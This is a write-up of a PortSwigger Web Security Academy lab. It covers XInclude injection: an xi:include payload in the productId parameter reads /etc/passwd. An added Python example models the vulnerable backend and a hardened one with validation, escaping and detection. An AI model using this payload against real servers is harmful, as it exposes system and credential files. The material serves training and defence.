Lab: Exploiting XInclude to retrieve files
tags: Portswigger Web Security Academy, Web
- Description: This lab has a “Check stock” feature that embeds the user input inside a server-side XML document that is subsequently parsed. Because you don’t control the entire XML document, you can’t define a DTD to launch a classic XXE attack.
- Goal: To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.
- Hint: By default, XInclude will try to parse the included document as XML. Since /etc/passwd isn’t valid XML, you will need to add an extra attribute to the XInclude directive to change this behavior.
Background
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include.
For example:
```xml
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
```
XInclude can be understood as "XML include". Anyone familiar with scripting languages will recognise the idea: PHP's include, and Python's and Java's import, can all pull in other files.
Recon
In this lab, the request did not contain XML-formatted data, so I can’t control the DTD to launch a classic XXE.
Therefore, can we use XInclude?
Exp
Just use the payload from the Background section and replace productId’s value with the exploit payload:
```
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```
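To see why the Background payload works and what the fix looks like on the server side, here is an added example (not part of this writeup or of the lab's own code) that models the "Check stock" backend with Python's standard-library `xml.etree.ElementInclude`. `build_stock_request`, `file_url_loader`, `SECRET_PATH` and the temp file standing in for /etc/passwd are all constructed for the demo; the vulnerable handler expands XInclude on a document containing user data, while the hardened handler validates the input, escapes it, and never runs the expansion.

```python
import os
import tempfile
from urllib.parse import urlparse
from xml.etree import ElementTree as ET, ElementInclude
from xml.sax.saxutils import escape

XI_NS = "http://www.w3.org/2001/XInclude"

# Constructed stand-in for /etc/passwd so the demo runs anywhere (assumption).
_tmpdir = tempfile.mkdtemp()
SECRET_PATH = os.path.join(_tmpdir, "passwd")
with open(SECRET_PATH, "w", encoding="utf-8") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")

# The payload from the Background section, pointed at the stand-in file.
PAYLOAD = (
    f'<foo xmlns:xi="{XI_NS}">'
    f'<xi:include parse="text" href="file://{SECRET_PATH}"/></foo>'
)


def build_stock_request(product_id: str, store_id: str) -> str:
    """Hypothetical backend: user input is pasted, unescaped, into a
    server-side XML document whose structure the user does not control."""
    return (
        "<stockCheck>"
        f"<productId>{product_id}</productId>"
        f"<storeId>{store_id}</storeId>"
        "</stockCheck>"
    )


def file_url_loader(href, parse, encoding=None):
    """Resolve file:// hrefs to paths before delegating to the default loader,
    which only understands plain filesystem paths (demo assumption)."""
    path = urlparse(href).path if href.startswith("file://") else href
    return ElementInclude.default_loader(path, parse, encoding)


def product_id_text(root: ET.Element) -> str:
    """All text under <productId>; a parse="text" include lands here."""
    return "".join(root.find("productId").itertext()).strip()


def parse_vulnerable(xml_text: str) -> str:
    """Vulnerable: XInclude is expanded on a document that embeds user data,
    so the xi:include in productId is replaced by the file's contents."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root, loader=file_url_loader)
    return product_id_text(root)


def parse_without_expansion(xml_text: str) -> str:
    """Same parse, but ElementInclude.include is never called: the directive
    stays inert markup and no file is read."""
    return product_id_text(ET.fromstring(xml_text))


def contains_xinclude(xml_text: str) -> bool:
    """Detection check for logging or rejection: any element in the XInclude
    namespace anywhere in the document."""
    root = ET.fromstring(xml_text)
    return any(el.tag.startswith("{" + XI_NS + "}") for el in root.iter())


def parse_hardened(product_id: str, store_id: str) -> str:
    """Hardened: validate before building XML, escape what is embedded, and
    never expand XInclude on the resulting document."""
    if not (product_id.isdigit() and store_id.isdigit()):
        raise ValueError("productId and storeId must be numeric")
    doc = build_stock_request(escape(product_id), escape(store_id))
    if contains_xinclude(doc):  # unreachable after validation; defense in depth
        raise ValueError("XInclude directive in request")
    return parse_without_expansion(doc)


if __name__ == "__main__":
    print("vulnerable:", parse_vulnerable(build_stock_request(PAYLOAD, "1")))
    print("no expansion:", repr(parse_without_expansion(build_stock_request(PAYLOAD, "1"))))
    print("hardened:", parse_hardened("1", "1"))
```

The key observation is that the injected element only becomes a file read when the application itself asks the parser to process XInclude. A parser that treats `xi:include` as ordinary markup leaks nothing, and input validation in front of the XML builder stops the directive from ever being embedded; the namespace check is a cheap signal for request logging or a WAF rule.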
:::spoiler Success Screenshot
:::